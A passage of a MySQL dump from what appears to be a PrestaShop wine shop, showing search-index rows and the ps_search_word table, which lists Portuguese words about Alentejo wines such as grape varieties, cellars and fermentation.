(73, 61344, 1),
(73, 61345, 1),
(73, 61346, 1),
(73, 61347, 1),
(73, 61348, 1),
(73, 61349, 1),
(73, 61350, 1),
(73, 61351, 1),
(73, 61352, 1),
(73, 61353, 1),
(73, 61354, 1),
(73, 61355, 1),
(73, 61356, 1),
(73, 61357, 1),
(73, 61358, 1),
(73, 61359, 1),
(73, 61360, 1),
(73, 61361, 1),
(73, 61362, 1),
(73, 61363, 1),
(73, 61364, 1),
(73, 61365, 1),
(73, 61366, 1),
(73, 61367, 1),
(73, 61368, 1),
(73, 61369, 1),
(73, 70432, 1),
(73, 70433, 1),
(73, 70434, 1),
(73, 70435, 1),
(73, 70436, 1),
(73, 70437, 1),
(73, 70438, 1),
(73, 70439, 1),
(73, 70440, 1),
(73, 70441, 1),
(73, 70442, 1),
(73, 70443, 1),
(73, 70444, 1),
(73, 70445, 1),
(73, 70446, 1),
(73, 70447, 1),
(73, 70448, 1),
(73, 70449, 1),
(73, 70450, 1),
(73, 70451, 1),
(73, 70452, 1),
(73, 70453, 1),
(73, 70454, 1),
(73, 70455, 1),
(73, 70456, 1),
(73, 797, 2),
(73, 816, 2),
(73, 817, 2),
(73, 818, 2),
(73, 819, 2),
(73, 820, 2),
(73, 821, 2),
(73, 822, 2),
(73, 825, 2),
(73, 826, 2),
(73, 827, 2),
(73, 828, 2),
(73, 829, 2),
(73, 1032, 2),
(73, 1047, 2),
(73, 1747, 2),
(73, 2948, 2),
(73, 3565, 2),
(73, 3577, 2),
(73, 3579, 2),
(73, 3580, 2),
(73, 3582, 2),
(73, 3587, 2),
(73, 3589, 2),
(73, 6680, 2),
(73, 10223, 2),
(73, 10224, 2),
(73, 10225, 2),
(73, 10226, 2),
(73, 10227, 2),
(73, 10228, 2),
(73, 14220, 2),
(73, 16407, 2),
(73, 788, 3),
(73, 795, 3),
(73, 823, 3),
(73, 3548, 3),
(73, 3557, 3),
(73, 3578, 3),
(73, 3584, 3),
(73, 773, 4),
(73, 61335, 6),
(73, 69435, 6),
(73, 69436, 6),
(73, 61633, 7),
(74, 772, 1),
(74, 791, 1),
(74, 793, 1),
(74, 1018, 1),
(74, 1032, 1),
(74, 1035, 1),
(74, 1036, 1),
(74, 1037, 1),
(74, 1049, 1),
(74, 1381, 1),
(74, 1880, 1),
(74, 1881, 1),
(74, 1884, 1),
(74, 1885, 1),
(74, 1889, 1),
(74, 2280, 1),
(74, 2298, 1),
(74, 2306, 1),
(74, 2569, 1),
(74, 2948, 1),
(74, 3565, 1),
(74, 4141, 1),
(74, 4181, 1),
(74, 4319, 1),
(74, 4475, 1),
(74, 4476, 1),
(74, 4477, 1),
(74, 6557, 1),
(74, 6558, 1),
(74, 8999, 1),
(74, 9000, 1),
(74, 9001, 1),
(74, 9003, 1),
(74, 9004, 1),
(74, 9005, 1),
(74, 9007, 1),
(74, 9008, 1),
(74, 14220, 1),
(74, 14230, 1),
(74, 15802, 1),
(74, 16407, 1),
(74, 16408, 1),
(74, 16409, 1),
(74, 16410, 1),
(74, 16411, 1),
(74, 16412, 1),
(74, 16413, 1),
(74, 16416, 1),
(74, 16417, 1),
(74, 16419, 1),
(74, 16420, 1),
(74, 16421, 1),
(74, 61339, 1),
(74, 61340, 1),
(74, 61341, 1),
(74, 61353, 1),
(74, 61354, 1),
(74, 61355, 1),
(74, 61357, 1),
(74, 61358, 1),
(74, 61359, 1),
(74, 61360, 1),
(74, 61361, 1),
(74, 61362, 1),
(74, 61363, 1),
(74, 61364, 1),
(74, 61365, 1),
(74, 61366, 1),
(74, 61367, 1),
(74, 61368, 1),
(74, 61369, 1),
(74, 61938, 1),
(74, 61939, 1),
(74, 61940, 1),
(74, 61941, 1),
(74, 61942, 1),
(74, 61943, 1),
(74, 61944, 1),
(74, 70436, 1),
(74, 70437, 1),
(74, 70580, 1),
(74, 70581, 1),
(74, 70582, 1),
(74, 70583, 1),
(74, 70584, 1),
(74, 70585, 1),
(74, 70586, 1),
(74, 70587, 1),
(74, 795, 2),
(74, 797, 2),
(74, 816, 2),
(74, 817, 2),
(74, 818, 2),
(74, 819, 2),
(74, 820, 2),
(74, 821, 2),
(74, 822, 2),
(74, 825, 2),
(74, 826, 2),
(74, 827, 2),
(74, 828, 2),
(74, 829, 2),
(74, 1047, 2),
(74, 1747, 2),
(74, 3577, 2),
(74, 3579, 2),
(74, 3580, 2),
(74, 3582, 2),
(74, 3587, 2),
(74, 3589, 2),
(74, 6680, 2),
(74, 10223, 2),
(74, 10224, 2),
(74, 10225, 2),
(74, 10226, 2),
(74, 10227, 2),
(74, 10228, 2),
(74, 788, 3),
(74, 823, 3),
(74, 3548, 3),
(74, 3557, 3),
(74, 3578, 3),
(74, 3584, 3),
(74, 773, 4),
(74, 69139, 6),
(74, 61935, 7),
(74, 61936, 7),
(74, 61937, 7),
(74, 69280, 7),
(74, 69281, 7),
(76, 772, 1),
(76, 778, 1),
(76, 793, 1),
(76, 797, 1),
(76, 1049, 1),
(76, 1305, 1),
(76, 1381, 1),
(76, 1383, 1),
(76, 1885, 1),
(76, 1889, 1),
(76, 2298, 1),
(76, 2306, 1),
(76, 2569, 1),
(76, 3565, 1),
(76, 3868, 1),
(76, 9000, 1),
(76, 9001, 1),
(76, 9003, 1),
(76, 9004, 1),
(76, 9005, 1),
(76, 9006, 1),
(76, 9007, 1),
(76, 9008, 1),
(76, 14230, 1),
(76, 14696, 1),
(76, 14938, 1),
(76, 14939, 1),
(76, 16409, 1),
(76, 16410, 1),
(76, 16411, 1),
(76, 16412, 1),
(76, 16413, 1),
(76, 16416, 1),
(76, 16417, 1),
(76, 16419, 1),
(76, 16420, 1),
(76, 16421, 1),
(76, 20802, 1),
(76, 61353, 1),
(76, 61354, 1),
(76, 61355, 1),
(76, 61357, 1),
(76, 61358, 1),
(76, 61359, 1),
(76, 61360, 1),
(76, 61361, 1),
(76, 61362, 1),
(76, 61363, 1),
(76, 61364, 1),
(76, 61365, 1),
(76, 61366, 1),
(76, 61367, 1),
(76, 61368, 1),
(76, 61369, 1),
(76, 62210, 1),
(76, 62211, 1),
(76, 62212, 1),
(76, 62213, 1),
(76, 62214, 1),
(76, 62215, 1),
(76, 62216, 1),
(76, 63436, 1),
(76, 70299, 1),
(76, 70705, 1),
(76, 70706, 1),
(76, 70707, 1),
(76, 70708, 1),
(76, 70709, 1),
(76, 791, 2),
(76, 795, 2),
(76, 816, 2),
(76, 817, 2),
(76, 818, 2),
(76, 819, 2),
(76, 820, 2),
(76, 821, 2),
(76, 822, 2),
(76, 825, 2),
(76, 826, 2),
(76, 827, 2),
(76, 828, 2),
(76, 829, 2),
(76, 1032, 2),
(76, 1035, 2),
(76, 1036, 2),
(76, 1037, 2),
(76, 1047, 2),
(76, 1747, 2),
(76, 2948, 2),
(76, 3577, 2),
(76, 3579, 2),
(76, 3580, 2),
(76, 3582, 2),
(76, 3587, 2),
(76, 3589, 2),
(76, 4475, 2),
(76, 4476, 2),
(76, 4477, 2),
(76, 6680, 2),
(76, 8999, 2),
(76, 10223, 2),
(76, 10224, 2),
(76, 10225, 2),
(76, 10226, 2),
(76, 10227, 2),
(76, 10228, 2),
(76, 14220, 2),
(76, 16407, 2),
(76, 16408, 2),
(76, 788, 3),
(76, 823, 3),
(76, 3548, 3),
(76, 3557, 3),
(76, 3578, 3),
(76, 3584, 3),
(76, 773, 4),
(76, 69139, 6),
(76, 1374, 7),
(76, 4458, 7),
(76, 61937, 7),
(77, 772, 1),
(77, 791, 1),
(77, 1035, 1),
(77, 1036, 1),
(77, 1037, 1),
(77, 1049, 1),
(77, 1381, 1),
(77, 1880, 1),
(77, 1881, 1),
(77, 1884, 1),
(77, 1885, 1),
(77, 1888, 1),
(77, 2280, 1),
(77, 2296, 1),
(77, 2298, 1),
(77, 2306, 1),
(77, 2318, 1),
(77, 2319, 1),
(77, 2320, 1),
(77, 2569, 1),
(77, 3562, 1),
(77, 3563, 1),
(77, 3993, 1),
(77, 4142, 1),
(77, 4319, 1),
(77, 4475, 1),
(77, 4476, 1),
(77, 4477, 1),
(77, 6557, 1),
(77, 6558, 1),
(77, 6854, 1),
(77, 6855, 1),
(77, 8999, 1),
(77, 9000, 1),
(77, 9001, 1),
(77, 9003, 1),
(77, 9004, 1),
(77, 9005, 1),
(77, 9007, 1),
(77, 9008, 1),
(77, 14228, 1),
(77, 14230, 1),
(77, 14822, 1),
(77, 14826, 1),
(77, 15791, 1),
(77, 15908, 1),
(77, 16408, 1),
(77, 16409, 1),
(77, 16410, 1),
(77, 16411, 1),
(77, 16412, 1),
(77, 16413, 1),
(77, 16416, 1),
(77, 16417, 1),
(77, 16419, 1),
(77, 16420, 1),
(77, 16421, 1),
(77, 61336, 1),
(77, 61337, 1),
(77, 61341, 1),
(77, 61354, 1),
(77, 61357, 1),
(77, 61358, 1),
(77, 61359, 1),
(77, 61360, 1),
(77, 61361, 1),
(77, 61362, 1),
(77, 61363, 1),
(77, 61364, 1),
(77, 61365, 1),
(77, 61366, 1),
(77, 61367, 1),
(77, 61368, 1),
(77, 61369, 1),
(77, 61940, 1),
(77, 63150, 1),
(77, 63151, 1),
(77, 63152, 1),
(77, 63153, 1),
(77, 63154, 1),
(77, 63155, 1),
(77, 63156, 1),
(77, 63157, 1),
(77, 63158, 1),
(77, 63159, 1),
(77, 63160, 1),
(77, 63161, 1),
(77, 63162, 1),
(77, 70285, 1),
(77, 70432, 1),
(77, 70437, 1),
(77, 70456, 1),
(77, 70582, 1),
(77, 70586, 1),
(77, 70707, 1),
(77, 70841, 1),
(77, 70842, 1),
(77, 70843, 1),
(77, 70844, 1),
(77, 70845, 1),
(77, 70846, 1),
(77, 70847, 1),
(77, 70848, 1),
(77, 70849, 1),
(77, 70850, 1),
(77, 70851, 1),
(77, 70852, 1),
(77, 793, 2),
(77, 797, 2),
(77, 816, 2),
(77, 817, 2),
(77, 818, 2),
(77, 819, 2),
(77, 820, 2),
(77, 821, 2),
(77, 822, 2),
(77, 825, 2),
(77, 826, 2),
(77, 827, 2),
(77, 828, 2),
(77, 829, 2),
(77, 1047, 2),
(77, 1747, 2),
(77, 1889, 2),
(77, 2948, 2),
(77, 3565, 2),
(77, 3577, 2),
(77, 3579, 2),
(77, 3580, 2),
(77, 3582, 2),
(77, 3587, 2),
(77, 3589, 2),
(77, 6680, 2),
(77, 10223, 2),
(77, 10224, 2),
(77, 10225, 2),
(77, 10226, 2),
(77, 10227, 2),
(77, 10228, 2),
(77, 14220, 2),
(77, 16407, 2),
(77, 61353, 2),
(77, 61355, 2),
(77, 788, 3),
(77, 795, 3),
(77, 823, 3),
(77, 3548, 3),
(77, 3557, 3),
(77, 3578, 3),
(77, 3584, 3),
(77, 773, 4),
(77, 1879, 6),
(77, 4170, 6),
(77, 4171, 6),
(77, 69139, 6),
(77, 61937, 7),
(77, 1032, 8),
(78, 772, 1),
(78, 793, 1),
(78, 796, 1),
(78, 797, 1),
(78, 1030, 1),
(78, 1032, 1),
(78, 1049, 1),
(78, 1300, 1),
(78, 1301, 1),
(78, 1373, 1),
(78, 1381, 1),
(78, 1882, 1),
(78, 1885, 1),
(78, 1889, 1),
(78, 2280, 1),
(78, 2298, 1),
(78, 2306, 1),
(78, 2569, 1),
(78, 2574, 1),
(78, 2948, 1),
(78, 3556, 1),
(78, 3565, 1),
(78, 3569, 1),
(78, 3868, 1),
(78, 4027, 1),
(78, 4150, 1),
(78, 4287, 1),
(78, 4297, 1),
(78, 4298, 1),
(78, 4319, 1),
(78, 8999, 1),
(78, 9000, 1),
(78, 9001, 1),
(78, 9003, 1),
(78, 9004, 1),
(78, 9005, 1),
(78, 9007, 1),
(78, 9008, 1),
(78, 14220, 1),
(78, 14230, 1),
(78, 14696, 1),
(78, 14700, 1),
(78, 14828, 1),
(78, 14937, 1),
(78, 15918, 1),
(78, 16018, 1),
(78, 16025, 1),
(78, 16027, 1),
(78, 16407, 1),
(78, 16408, 1),
(78, 16409, 1),
(78, 16410, 1),
(78, 16411, 1),
(78, 16412, 1),
(78, 16413, 1),
(78, 16416, 1),
(78, 16417, 1),
(78, 16419, 1),
(78, 16420, 1),
(78, 16421, 1),
(78, 34311, 1),
(78, 59732, 1),
(78, 61353, 1),
(78, 61354, 1),
(78, 61355, 1),
(78, 61357, 1),
(78, 61358, 1),
(78, 61360, 1),
(78, 61361, 1),
(78, 61362, 1),
(78, 61363, 1),
(78, 61364, 1),
(78, 61365, 1),
(78, 61366, 1),
(78, 61367, 1),
(78, 61368, 1),
(78, 61369, 1),
(78, 63569, 1),
(78, 63570, 1),
(78, 63571, 1),
(78, 63572, 1),
(78, 63573, 1),
(78, 63574, 1),
(78, 63575, 1),
(78, 63576, 1),
(78, 63577, 1),
(78, 63578, 1),
(78, 63579, 1),
(78, 63580, 1),
(78, 63581, 1),
(78, 63582, 1),
(78, 63583, 1),
(78, 63584, 1),
(78, 63585, 1),
(78, 63586, 1),
(78, 63587, 1),
(78, 63588, 1),
(78, 70290, 1),
(78, 70849, 1),
(78, 70999, 1),
(78, 71000, 1),
(78, 71001, 1),
(78, 71002, 1),
(78, 71003, 1),
(78, 71004, 1),
(78, 71005, 1),
(78, 71006, 1),
(78, 71007, 1),
(78, 71008, 1),
(78, 71009, 1),
(78, 71010, 1),
(78, 71011, 1),
(78, 71012, 1),
(78, 71013, 1),
(78, 71014, 1),
(78, 71015, 1),
(78, 71016, 1),
(78, 71017, 1),
(78, 71018, 1),
(78, 791, 2),
(78, 816, 2),
(78, 817, 2),
(78, 818, 2),
(78, 819, 2),
(78, 820, 2),
(78, 821, 2),
(78, 822, 2),
(78, 824, 2),
(78, 825, 2),
(78, 826, 2),
(78, 827, 2),
(78, 828, 2),
(78, 829, 2),
(78, 3577, 2),
(78, 3579, 2),
(78, 3580, 2),
(78, 3581, 2),
(78, 3582, 2),
(78, 3583, 2),
(78, 3585, 2),
(78, 3586, 2),
(78, 3587, 2),
(78, 3588, 2),
(78, 3589, 2),
(78, 61359, 2),
(78, 788, 3),
(78, 795, 3),
(78, 823, 3),
(78, 3548, 3),
(78, 3557, 3),
(78, 3578, 3),
(78, 3584, 3),
(78, 773, 4),
(78, 3549, 7),
(78, 775, 8),
(79, 772, 1),
(79, 791, 1),
(79, 793, 1),
(79, 1032, 1),
(79, 1049, 1),
(79, 1300, 1),
(79, 1381, 1),
(79, 1885, 1),
(79, 1889, 1),
(79, 2296, 1),
(79, 2298, 1),
(79, 2306, 1),
(79, 2569, 1),
(79, 2948, 1),
(79, 4142, 1),
(79, 9000, 1),
(79, 9001, 1),
(79, 9003, 1),
(79, 9004, 1),
(79, 9005, 1),
(79, 9006, 1),
(79, 9007, 1),
(79, 9008, 1),
(79, 14220, 1),
(79, 14228, 1),
(79, 14230, 1),
(79, 15908, 1),
(79, 16407, 1),
(79, 16409, 1),
(79, 16410, 1),
(79, 16411, 1),
(79, 16412, 1),
(79, 16413, 1),
(79, 16416, 1),
(79, 16417, 1),
(79, 16419, 1),
(79, 16420, 1),
(79, 16421, 1),
(79, 61338, 1),
(79, 61339, 1),
(79, 61353, 1),
(79, 61354, 1),
(79, 61355, 1),
(79, 61357, 1),
(79, 61358, 1),
(79, 61359, 1),
(79, 61360, 1),
(79, 61361, 1),
(79, 61362, 1),
(79, 61363, 1),
(79, 61364, 1),
(79, 61365, 1),
(79, 61366, 1),
(79, 61367, 1),
(79, 61368, 1),
(79, 61369, 1),
(79, 63153, 1),
(79, 63872, 1),
(79, 63873, 1),
(79, 70285, 1),
(79, 70301, 1),
(79, 70434, 1),
(79, 70435, 1),
(79, 70843, 1),
(79, 797, 2),
(79, 816, 2),
(79, 817, 2),
(79, 818, 2),
(79, 819, 2),
(79, 820, 2),
(79, 821, 2),
(79, 822, 2),
(79, 824, 2),
(79, 825, 2),
(79, 826, 2),
(79, 827, 2),
(79, 828, 2),
(79, 829, 2),
(79, 1301, 2),
(79, 3548, 2),
(79, 3565, 2),
(79, 3577, 2),
(79, 3579, 2),
(79, 3580, 2),
(79, 3581, 2),
(79, 3582, 2),
(79, 3583, 2),
(79, 3585, 2),
(79, 3586, 2),
(79, 3587, 2),
(79, 3588, 2),
(79, 3589, 2),
(79, 4027, 2),
(79, 8999, 2),
(79, 16408, 2),
(79, 70290, 2),
(79, 773, 3),
(79, 788, 3),
(79, 795, 3),
(79, 823, 3),
(79, 3557, 3),
(79, 3578, 3),
(79, 3584, 3),
(79, 3848, 6),
(79, 1270, 7),
(79, 63869, 7),
(79, 63870, 7),
(79, 63871, 7),
(79, 70138, 7),
(79, 70139, 7),
(79, 70140, 7),
(80, 772, 1),
(80, 778, 1),
(80, 791, 1),
(80, 793, 1),
(80, 1032, 1),
(80, 1049, 1),
(80, 1050, 1),
(80, 1300, 1),
(80, 1381, 1),
(80, 1393, 1),
(80, 1885, 1),
(80, 1889, 1),
(80, 2296, 1),
(80, 2298, 1),
(80, 2306, 1),
(80, 2569, 1),
(80, 2937, 1),
(80, 2948, 1),
(80, 3993, 1),
(80, 4001, 1),
(80, 4004, 1),
(80, 4005, 1),
(80, 4006, 1),
(80, 4142, 1),
(80, 8999, 1),
(80, 9000, 1),
(80, 9001, 1),
(80, 9003, 1),
(80, 9004, 1),
(80, 9005, 1),
(80, 9006, 1),
(80, 9007, 1),
(80, 9008, 1),
(80, 14220, 1),
(80, 14228, 1),
(80, 14230, 1),
(80, 14697, 1),
(80, 15791, 1),
(80, 15801, 1),
(80, 15803, 1),
(80, 15908, 1),
(80, 16407, 1),
(80, 16408, 1),
(80, 16409, 1),
(80, 16410, 1),
(80, 16411, 1),
(80, 16412, 1),
(80, 16413, 1),
(80, 16416, 1),
(80, 16417, 1),
(80, 16419, 1),
(80, 16420, 1),
(80, 16421, 1),
(80, 61353, 1),
(80, 61354, 1),
(80, 61355, 1),
(80, 61357, 1),
(80, 61358, 1),
(80, 61359, 1),
(80, 61360, 1),
(80, 61361, 1),
(80, 61362, 1),
(80, 61363, 1),
(80, 61364, 1),
(80, 61365, 1),
(80, 61366, 1),
(80, 61367, 1),
(80, 61368, 1),
(80, 61369, 1),
(80, 63872, 1),
(80, 63873, 1),
(80, 64269, 1),
(80, 64270, 1),
(80, 64271, 1),
(80, 64272, 1),
(80, 64273, 1),
(80, 64274, 1),
(80, 64275, 1),
(80, 64276, 1),
(80, 64277, 1),
(80, 64278, 1),
(80, 64279, 1),
(80, 64280, 1),
(80, 64281, 1),
(80, 70285, 1),
(80, 70286, 1),
(80, 70287, 1),
(80, 70288, 1),
(80, 70289, 1),
(80, 70291, 1),
(80, 70292, 1),
(80, 70293, 1),
(80, 70294, 1),
(80, 70295, 1),
(80, 70296, 1),
(80, 70297, 1),
(80, 70298, 1),
(80, 70299, 1),
(80, 70300, 1),
(80, 70301, 1),
(80, 797, 2),
(80, 816, 2),
(80, 817, 2),
(80, 818, 2),
(80, 819, 2),
(80, 820, 2),
(80, 821, 2),
(80, 822, 2),
(80, 824, 2),
(80, 825, 2),
(80, 826, 2),
(80, 827, 2),
(80, 828, 2),
(80, 829, 2),
(80, 1301, 2),
(80, 3565, 2),
(80, 3577, 2),
(80, 3579, 2),
(80, 3580, 2),
(80, 3581, 2),
(80, 3582, 2),
(80, 3583, 2),
(80, 3585, 2),
(80, 3586, 2),
(80, 3587, 2),
(80, 3588, 2),
(80, 3589, 2),
(80, 4027, 2),
(80, 70290, 2),
(80, 788, 3),
(80, 795, 3),
(80, 823, 3),
(80, 3548, 3),
(80, 3557, 3),
(80, 3578, 3),
(80, 3584, 3),
(80, 773, 4),
(80, 3848, 6),
(80, 1270, 7),
(80, 3991, 7),
(80, 4024, 7),
(81, 773, 1),
(81, 786, 1),
(81, 788, 1),
(81, 791, 1),
(81, 795, 1),
(81, 806, 1),
(81, 807, 1),
(81, 823, 1),
(81, 1381, 1),
(81, 1879, 1),
(81, 2296, 1),
(81, 2298, 1),
(81, 2299, 1),
(81, 2540, 1),
(81, 2543, 1),
(81, 2544, 1),
(81, 2559, 1),
(81, 2561, 1),
(81, 2937, 1),
(81, 3994, 1),
(81, 39227, 1),
(81, 39228, 1),
(81, 55901, 1),
(81, 59547, 1),
(81, 59550, 1),
(81, 59553, 1),
(81, 59554, 1),
(81, 59555, 1),
(81, 59556, 1),
(81, 59557, 1),
(81, 59716, 1),
(81, 59717, 1),
(81, 59718, 1),
(81, 59719, 1),
(81, 59720, 1),
(81, 59721, 1),
(81, 59722, 1),
(81, 59723, 1),
(81, 59724, 1),
(81, 59725, 1),
(81, 59726, 1),
(81, 59727, 1),
(81, 59728, 1),
(81, 59729, 1),
(81, 59730, 1),
(81, 59731, 1),
(81, 59732, 1),
(81, 59733, 1),
(81, 59734, 1),
(81, 59753, 1),
(81, 59754, 1),
(81, 59755, 1),
(81, 59756, 1),
(81, 59757, 1),
(81, 59758, 1),
(81, 59759, 1),
(81, 59760, 1),
(81, 59815, 1),
(81, 830, 3),
(81, 3590, 3),
(81, 797, 6),
(81, 819, 6),
(81, 3548, 6),
(81, 12078, 6),
(81, 68886, 6);

-- --------------------------------------------------------

--
-- Table structure for table `ps_search_word`
--

CREATE TABLE `ps_search_word` (
  `id_word` int(10) UNSIGNED NOT NULL,
  `id_shop` int(11) UNSIGNED NOT NULL DEFAULT '1',
  `id_lang` int(10) UNSIGNED NOT NULL,
  `word` varchar(15) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_search_word`
--

INSERT INTO `ps_search_word` (`id_word`, `id_shop`, `id_lang`, `word`) VALUES
(2567, 1, 1, '004'),
(45184, 1, 1, '01012022'),
(55590, 1, 1, '01012023'),
(37283, 1, 1, '01112021'),
(1288, 1, 1, '100'),
(1747, 1, 1, '1020'),
(9805, 1, 1, '1040'),
(1872, 1, 1, '107'),
(61944, 1, 1, '1218'),
(60547, 1, 1, '125'),
(23091, 1, 1, '1250'),
(22745, 1, 1, '1357'),
(9006, 1, 1, '145'),
(1748, 1, 1, '165'),
(24818, 1, 1, '1786'),
(1374, 1, 1, '1856'),
(2409, 1, 1, '1928'),
(63588, 1, 1, '1974'),
(3991, 1, 1, '1x1'),
(1028, 1, 1, '2015'),
(1013, 1, 1, '2016'),
(775, 1, 1, '2017'),
(1270, 1, 1, '2018'),
(61937, 1, 1, '2019'),
(61633, 1, 1, '2022'),
(1024, 1, 1, '2106'),
(21010, 1, 1, '2143'),
(63873, 1, 1, '2160'),
(9377, 1, 1, '2208'),
(1559, 1, 1, '2320'),
(59815, 1, 1, '275'),
(27773, 1, 1, '31122021'),
(45185, 1, 1, '31122022'),
(55591, 1, 1, '31122023'),
(9123, 1, 1, '3231'),
(9002, 1, 1, '3400'),
(61356, 1, 1, '3798'),
(63436, 1, 1, '410'),
(10026, 1, 1, '480'),
(64277, 1, 1, '5050'),
(63162, 1, 1, '5760'),
(9892, 1, 1, '588'),
(9678, 1, 1, '700'),
(9494, 1, 1, '821'),
(10307, 1, 1, '900'),
(9592, 1, 1, '980'),
(822, 1, 1, 'abra'),
(64280, 1, 1, 'acaba'),
(4002, 1, 1, 'acabou'),
(61349, 1, 1, 'acidez'),
(2545, 1, 1, 'acompanhada'),
(59549, 1, 1, 'acompanhado'),
(63585, 1, 1, 'acrescida'),
(1015, 1, 1, 'acv'),
(59547, 1, 1, 'adega'),
(1746, 1, 1, 'adjetivo'),
(1882, 1, 1, 'ainda'),
(9005, 1, 1, 'alcoolico'),
(4145, 1, 1, 'aleatoria'),
(1388, 1, 1, 'alem'),
(1034, 1, 1, 'alentejanas'),
(1885, 1, 1, 'alentejo'),
(61351, 1, 1, 'alguma'),
(1871, 1, 1, 'alice'),
(2291, 1, 1, 'alimento'),
(4295, 1, 1, 'alto'),
(1269, 1, 1, 'anfora'),
(793, 1, 1, 'ano'),
(2296, 1, 1, 'anos'),
(1035, 1, 1, 'antao'),
(63150, 1, 1, 'antiga'),
(1879, 1, 1, 'antigas'),
(1278, 1, 1, 'antiguidade'),
(9001, 1, 1, 'anual'),
(1045, 1, 1, 'aos'),
(2297, 1, 1, 'apelidarmos'),
(808, 1, 1, 'aplicamos'),
(63159, 1, 1, 'apresenta'),
(1290, 1, 1, 'arabe'),
(1300, 1, 1, 'aragones'),
(63872, 1, 1, 'aragonez'),
(61354, 1, 1, 'arenoso'),
(63156, 1, 1, 'arenosos'),
(1037, 1, 1, 'arinto'),
(61942, 1, 1, 'arredondado'),
(61363, 1, 1, 'artificialmente'),
(1021, 1, 1, 'ato'),
(1387, 1, 1, 'atribuido'),
(2286, 1, 1, 'autoctones'),
(59556, 1, 1, 'azeite'),
(61344, 1, 1, 'bacelos'),
(1276, 1, 1, 'barro'),
(1889, 1, 1, 'base'),
(9000, 1, 1, 'beja'),
(1393, 1, 1, 'bem'),
(2288, 1, 1, 'bland'),
(2285, 1, 1, 'blands'),
(63153, 1, 1, 'blend'),
(61348, 1, 1, 'boa'),
(1012, 1, 1, 'branco'),
(15298, 1, 1, 'branco2016'),
(4135, 1, 1, 'brancos'),
(59732, 1, 1, 'caracteristicas'),
(61943, 1, 1, 'caracteristico'),
(7402, 1, 1, 'caracterizam'),
(3993, 1, 1, 'casta'),
(1032, 1, 1, 'castas'),
(59753, 1, 1, 'centenarias'),
(4143, 1, 1, 'cepas'),
(4142, 1, 1, 'cerca'),
(63871, 1, 1, 'clara'),
(1049, 1, 1, 'classificacao'),
(1382, 1, 1, 'classificado'),
(34308, 1, 1, 'clique'),
(1022, 1, 1, 'colheita'),
(1293, 1, 1, 'colocar'),
(2544, 1, 1, 'comentada'),
(34311, 1, 1, 'completa'),
(1030, 1, 1, 'composicao'),
(63151, 1, 1, 'composto'),
(1375, 1, 1, 'compra'),
(59727, 1, 1, 'comprovar'),
(59551, 1, 1, 'conhecer'),
(2282, 1, 1, 'conhecido'),
(777, 1, 1, 'conseguido'),
(4291, 1, 1, 'conseguimos'),
(784, 1, 1, 'conseguirem'),
(7405, 1, 1, 'consensual'),
(63587, 1, 1, 'consequentement'),
(9007, 1, 1, 'conservacao'),
(59717, 1, 1, 'consigo'),
(59760, 1, 1, 'consulta'),
(2572, 1, 1, 'contacto'),
(59716, 1, 1, 'contamos'),
(61365, 1, 1, 'conter'),
(4148, 1, 1, 'continua'),
(1044, 1, 1, 'conversa'),
(819, 1, 1, 'copo'),
(62209, 1, 1, 'copy'),
(64274, 1, 1, 'costume'),
(4141, 1, 1, 'cucufate'),
(63578, 1, 1, 'cuidados'),
(1887, 1, 1, 'cujos'),
(1285, 1, 1, 'curval'),
(2408, 1, 1, 'cx6'),
(803, 1, 1, 'dai'),
(4003, 1, 1, 'dando'),
(4292, 1, 1, 'dao'),
(1018, 1, 1, 'das'),
(62210, 1, 1, 'data'),
(1385, 1, 1, 'datada'),
(7410, 1, 1, 'deixa'),
(4299, 1, 1, 'demorada'),
(61366, 1, 1, 'deposito'),
(1279, 1, 1, 'desafiamos'),
(59755, 1, 1, 'deslocacao'),
(4000, 1, 1, 'desta'),
(59718, 1, 1, 'desvendar'),
(4149, 1, 1, 'determinar'),
(61359, 1, 1, 'devido'),
(2318, 1, 1, 'diagalves'),
(63158, 1, 1, 'diferencas'),
(2281, 1, 1, 'diferenciado'),
(3998, 1, 1, 'diferente'),
(818, 1, 1, 'diretamente'),
(2573, 1, 1, 'direto'),
(825, 1, 1, 'dispensado'),
(780, 1, 1, 'dissipar'),
(1048, 1, 1, 'distincoes'),
(772, 1, 1, 'doc'),
(786, 1, 1, 'dos'),
(1031, 1, 1, 'duas'),
(2569, 1, 1, 'duracao'),
(782, 1, 1, 'duvidas'),
(1372, 1, 1, 'edicao'),
(1025, 1, 1, 'elaborado'),
(4004, 1, 1, 'elegancia'),
(4297, 1, 1, 'elevada'),
(1296, 1, 1, 'embalagem'),
(64270, 1, 1, 'engano'),
(62211, 1, 1, 'engarrafado'),
(59728, 1, 1, 'engarrafar'),
(2566, 1, 1, 'enologica'),
(60890, 1, 1, 'enoturismo'),
(820, 1, 1, 'entanto'),
(1043, 1, 1, 'entrada'),
(7401, 1, 1, 'entram'),
(62212, 1, 1, 'envelhecido'),
(1380, 1, 1, 'envio'),
(4290, 1, 1, 'equilibradas'),
(61347, 1, 1, 'equilibrado'),
(64273, 1, 1, 'era'),
(63869, 1, 1, 'ermida'),
(1011, 1, 1, 'escolha'),
(1023, 1, 1, 'escolhs'),
(828, 1, 1, 'espaco'),
(4144, 1, 1, 'espalhadas'),
(15449, 1, 1, 'espanha'),
(1373, 1, 1, 'especial'),
(63570, 1, 1, 'espelha'),
(1875, 1, 1, 'esposa'),
(61939, 1, 1, 'esta'),
(61361, 1, 1, 'estabilizado'),
(2294, 1, 1, 'estagiar'),
(1383, 1, 1, 'estagiou'),
(3995, 1, 1, 'estava'),
(778, 1, 1, 'este'),
(34306, 1, 1, 'estilo'),
(4287, 1, 1, 'estrutura'),
(59733, 1, 1, 'evolui'),
(2284, 1, 1, 'excepcionais'),
(4138, 1, 1, 'exclusivos'),
(2562, 1, 1, 'experiencia'),
(2564, 1, 1, 'explicacao'),
(63154, 1, 1, 'exprime'),
(63586, 1, 1, 'extracao'),
(34305, 1, 1, 'extraordinario'),
(63581, 1, 1, 'facto'),
(2292, 1, 1, 'fantastico'),
(2287, 1, 1, 'fazem'),
(3999, 1, 1, 'fazemos'),
(4006, 1, 1, 'feminina'),
(4298, 1, 1, 'fenolica'),
(4150, 1, 1, 'fermentacao'),
(63152, 1, 1, 'field'),
(63571, 1, 1, 'filosofia'),
(61362, 1, 1, 'filtrado'),
(4293, 1, 1, 'firme'),
(1297, 1, 1, 'flexivel'),
(2559, 1, 1, 'forma'),
(1274, 1, 1, 'formato'),
(2280, 1, 1, 'frades'),
(61353, 1, 1, 'franco'),
(61369, 1, 1, 'franco-arenoso'),
(63161, 1, 1, 'franco-arenosos'),
